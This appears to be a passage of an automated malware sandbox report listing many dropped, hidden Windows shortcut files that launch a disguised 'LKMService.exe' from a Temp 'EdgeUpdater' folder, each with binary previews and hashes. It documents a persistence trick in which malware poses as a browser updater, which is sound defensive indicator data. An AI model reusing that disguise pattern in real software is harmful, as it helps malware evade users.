                Preview:L..................F....".....X:3...DX.;3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:56 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.935989893915646
                Encrypted:false
                SSDEEP:24:8SVRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8kJD3lfAvRAt41vgHyg
                MD5:93CC64C9BD3BABCECED57BAD5CF09A49
                SHA1:51DF500AC875C6149E3BDED0CBA8F20A530AEC9D
                SHA-256:BE5364CA30EBE7FB1A330A530305F0BAFCC918EBDCDAF5EE748451F4052AEE2C
                SHA-512:8B1D70B3C0F460CD1F26B95E902E0677B71F49166F7CFEC52E4873083B30D3F5B8CC28D0028EEB141C3E25E37D163B71FB10687F743B14B53C874485F4F96DDB
                Malicious:false
                Preview:L..................F....".....X:3....C.U3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:15 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.939044252292188
                Encrypted:false
                SSDEEP:24:8SARJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8rJD3lfAvRAt41vgHyg
                MD5:AB1112D9456D869D7232E5D8F8D2325F
                SHA1:5B6A82202330036F0EDDB696B33AB9AE298A17C8
                SHA-256:400AE984ABF7D50E9C672ABAEE1C099E4A4BB1EEC3F3AA3A3BBCA998A8FA42F3
                SHA-512:D8542A08C22AEC1E0B3DD938D470594E843A56ADF63EB3D50FB0D25C8B17099452E2717F7E0B5AF8AC106539D89B41A9D2679DD49A0650EA0957293D6B9BDC5D
                Malicious:false
                Preview:L..................F....".....X:3...v..`3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:17 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.943375268308793
                Encrypted:false
                SSDEEP:24:8rRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8dJD3lfAvRAt41vgHyg
                MD5:CC249D0CDDF94C0D181BB0236C0CA40E
                SHA1:611D66FA3BA836AB5A68A059239D63D0F7BC7B76
                SHA-256:7CA61E7D219E1B280218EB48CC8CD368E5AFCDAFF27F5BD36BD72E9E70D7471A
                SHA-512:07C5FDFD51A29E7137AFE0E9BE8EF07E2F2599050D05037F518D0A36FABB2EEDD8B37F8481EF5EB84DCE4E79102CD5C580707F42CC23643432C6A2685CE132C2
                Malicious:false
                Preview:L..................F....".....X:3....;Ab3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:40 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.937929191810866
                Encrypted:false
                SSDEEP:24:8KRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8cJD3lfAvRAt41vgHyg
                MD5:421108D2B9B6C809ACEAFF0804CD9EE1
                SHA1:E108D768F6062F2FFD2CEFC19B9F23E6C7FDD510
                SHA-256:35D96769A67F1036CEEDFF9D03ED07E2EC8AFBCFFD9880948E7ECE43BD71863E
                SHA-512:ABB2AC017BC8193E5DBECFE0ADD85625E1707718F9A00146C66086801DED589F8FB158294688795B1F4425991E66CC855DDB1572017FA7AE0BD4F6082F9FC6C0
                Malicious:false
                Preview:L..................F....".....X:3...jv.L3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:47 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.936641261574785
                Encrypted:false
                SSDEEP:24:85RJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8nJD3lfAvRAt41vgHyg
                MD5:DEDCDD88390B5893F0A7FEAE0E40FCCE
                SHA1:28B3C902523B53823DCBAD075DB9E881615320E2
                SHA-256:9387B9A9627129A56EFB57BF9F7884597C2C4D10BBBACF2DE77EE377CE72F8AF
                SHA-512:3EB7D8620AC5D33AB6969EB2ABD1BC2304EA50B567B62A1F5D310E5F0C70ADFE61D7905AE7F1A15471429B2BD0EA4E29908DA3E1E0DF030464A8042C565972CC
                Malicious:false
                Preview:L..................F....".....X:3.....BP3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:14 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.936809385261839
                Encrypted:false
                SSDEEP:24:8zyRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8gJD3lfAvRAt41vgHyg
                MD5:6B0E7F9A3E07FA41C6BA6E7DC97833FE
                SHA1:E91737FB02918232B5213EF69C0B1E483155BEA9
                SHA-256:2C78505615C335FEB6C57DE27F4870054A08833F453515D5861EFFCE19FB3046
                SHA-512:729796654FB9C0A31202D86D578EEC301C0BA6B99B7B17A095977DDCDC43FC612D3BB40797C5060BFFE6538CE29F46B4A0024B58E304AD6927C01B04C12213D2
                Malicious:false
                Preview:L..................F....".....X:3...?._`3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:27 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.9328567852734055
                Encrypted:false
                SSDEEP:24:8sRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:86JD3lfAvRAt41vgHyg
                MD5:B9ABD2EB90D9300A2B0C4C26FB7EF557
                SHA1:C49EB3A923F99C64806AC64BF6417B14ED0CA831
                SHA-256:316D4EF100DB473DB0E39C5F125C784B970223232526772A0748153EAFBC6807
                SHA-512:11CE93694D578DD9FCB014C68B9D3F6930427A529721C1A72AF6F729CD2929A51EB09CA619C570F828878047D70F8E80DA7B4DF40BC463E16AD273CCF440BA21
                Malicious:false
                Preview:L..................F....".....X:3...e..D3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:23 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.93504182173481
                Encrypted:false
                SSDEEP:24:8N8WERJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8nCJD3lfAvRAt41vgHyg
                MD5:5FB346F6183BE86EA4A0B43379CC6370
                SHA1:8891989AFD013DBF22EB77372816C4624B34B102
                SHA-256:86842654D6A509FCC99151FC1017B8842A78AED4B9BF1D45D4B37F8303174868
                SHA-512:FA34538BF1826BD373C459C3FE5E4F7CC0A6D154CCBD9CB11C9BC7E873A28649473859EF6AF00F31DC8A65F92B71FFACB01D6B1F4E6C44E89EB13F472D60F726
                Malicious:false
                Preview:L..................F....".....X:3...s.lB3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:14 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.937570052019027
                Encrypted:false
                SSDEEP:24:8VRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8bJD3lfAvRAt41vgHyg
                MD5:0B86BCCEA21A33A3B145D5A9F0061874
                SHA1:9F74CA5DA1F834458B00D2699F961B9D409654A4
                SHA-256:B5840DFBC433E0DAB35E3CD6A8F04DB4CFA7FF21DFED99A105AA7DF9A608B21B
                SHA-512:921C5EEA35C05676C5F89E18230E3DF61CD8CD0A70AC50A1980EEB61CA4A5D6E2A82D700D99D756DC343B59641711E7E901D3E5612DBABD4EE4C0C97C5DB872E
                Malicious:false
                Preview:L..................F....".....X:3...'G.<3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:08 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.937073190614132
                Encrypted:false
                SSDEEP:24:8JRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:83JD3lfAvRAt41vgHyg
                MD5:E6E5E99ED0EB5932F7958EA4AF3BCC9E
                SHA1:0E0BF21AD7B2E6B85C3F029ED43E022EAD7372DD
                SHA-256:A25E81E477647C8960832374489316A2B162A0565A9C442E50F1F655503FE233
                SHA-512:520FF7904D51BD22D0843C0DC93E7B713BD09F87AA1EFDBAF68C1F63DB9C195D34EE392940F50C182A4BC1D528AA3F125BECBDAF8F1BFDA053FD5E219ED22418
                Malicious:false
                Preview:L..................F....".....X:3....A.\3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:20 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.9371221825109135
                Encrypted:false
                SSDEEP:24:8+VRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8QJD3lfAvRAt41vgHyg
                MD5:B828A32076F70162F612588ADF0C01A6
                SHA1:2C7F0B684891C5E887B1E00A75EB3555C800EB59
                SHA-256:E96E0CCE0142FD36ED13713CFF481AD20B12B882DE317157570F5A9E2278B54D
                SHA-512:FBE70A1F5078380370C90656DDF51BA1368F48860E05944AEBCCEDC1C744D26F69F8F7E940C7C632B2B6ECC57D17710396C50D1683D8123723C8985F5844245F
                Malicious:false
                Preview:L..................F....".....X:3....Td@3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:59 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.941691766625291
                Encrypted:false
                SSDEEP:24:8dRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8TJD3lfAvRAt41vgHyg
                MD5:CF7480CB36415569C627221436AE0BFC
                SHA1:F4D4482BB67FFC50E2745BFB9E8725E6A9E09043
                SHA-256:CB29BA9C39FF6FE3AE34E583DB475A082751419E96DDAE476AD98C39B370231E
                SHA-512:9DE4214435D7EA2009D9A6B1E99B19E7D949C1AF791CD49CDE59DAB4462BF599E6A3E505571C28A9F0FA18C6758E882BF6EB973041AF441113BE749EFB719FA6
                Malicious:false
                Preview:L..................F....".....X:3......W3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:58 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.93705390887754
                Encrypted:false
                SSDEEP:24:8mRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8wJD3lfAvRAt41vgHyg
                MD5:E4BBF50FDE195699A3D2B6B307D9EC41
                SHA1:9AC36022917FB72B6E16D99626FE6507051DC89A
                SHA-256:57A99AA39D0C0D22E8706090ABEB1EE88DEB95F3DF1D5F76C8D8DA5384351F43
                SHA-512:25118E35741FA116A39693C9815FAC0BBEE41C9004F849AA461F5E7135372282E674618B0EC84DB9333760E8205C4B0C4E242012B6FB6F6DC6C1FCAB2F5E6AE9
                Malicious:false
                Preview:L..................F....".....X:3.....0W3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:05 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.944730184533065
                Encrypted:false
                SSDEEP:24:8DhRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8DfJD3lfAvRAt41vgHyg
                MD5:982CF5F4EFFA8FD32566FAE981BB15A8
                SHA1:ED48B7C90988B455A531ECBEE16322EF7E33EBB4
                SHA-256:83327DE9D5813497ABB5A11ADF5B439E78B61209E2DCCA842CE87799028F1A5A
                SHA-512:5B3D86A811EFA95564DB4B71615699632DF0D6AA0A85E8910C1DC21A994424CC8CA2610190442C5219B0605EC52F4C0853A905F825199CB881FA647ADC9A5B9F
                Malicious:false
